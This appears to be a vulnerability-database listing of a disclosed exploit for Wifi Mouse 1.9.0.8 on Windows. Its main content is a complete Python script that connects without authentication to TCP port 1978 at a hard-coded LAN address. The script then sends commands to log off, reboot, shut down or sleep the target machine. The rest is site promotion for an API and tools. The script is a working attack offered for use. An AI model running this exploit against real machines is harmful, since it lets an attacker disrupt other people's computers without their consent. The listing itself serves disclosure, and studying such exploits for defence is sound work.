Lucene search
K

📄 Wifi Mouse 1.9.0.8 Unauthenticated Remote System Control

🗓️ 21 Jul 2025 00:00:00Reported by Chokri HammediType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 97 Views

Wifi Mouse 1.9.0.8 exposes an unauthenticated TCP interface on port 1978 for remote power control.

Code
# Exploit Title: Wifi Mouse 1.9.0.8 - Remote Power Control
    (Shutdown/Reboot/Logoff)
    # Date: 19/07/2025
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://wifimouse.necta.us/
    # Software Link: https://wifimouse.necta.us/apk/MouseServer.exe
    # Version: 1.9.0.8 (Windows)
    # Tested on: Windows 10 / Windows 11
    
    
    '''
    Description:
    
    Wifi Mouse 1.9.0.8 exposes a TCP control interface on port 1978 that allows
    remote execution of power commands (shutdown, restart, sleep, logoff) via
    unauthenticated commands. An attacker on the same network can exploit this
    to disrupt the system remotely without user interaction.
    
    '''
    
    import socket
    
    ip, port = "192.168.8.103", 1978
    
    hs_cmds = [
        b"reportCurrentApp\x0a",
        b"dontreportCurrentApp\x0a"
    ]
    
    cmds = {
        'off': b"logoff\x0a",
        'reboot': b"reboot\x0a",
        'shutdown': b"poweroff\x0a",
        'sleep': b"sleep\x0a"
    }
    
    def connect():
        s = socket.socket()
        s.connect((ip, port))
        for cmd in hs_cmds:
            s.sendall(cmd)
    
        return s
    
    def send(s, cmd):
        s.sendall(cmd)
    
    
    def main():
        s = connect()
        try:
            print("\ncmds: " + ", ".join(cmds))
            while True:
                c = input("\ncmd> ").lower()
                if c == 'exit': break
                if c in cmds: send(s, cmds[c])
                else: print("?")
        finally:
            s.close()
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jul 2025 00:00Current
7.8High risk
Vulners AI Score7.8
97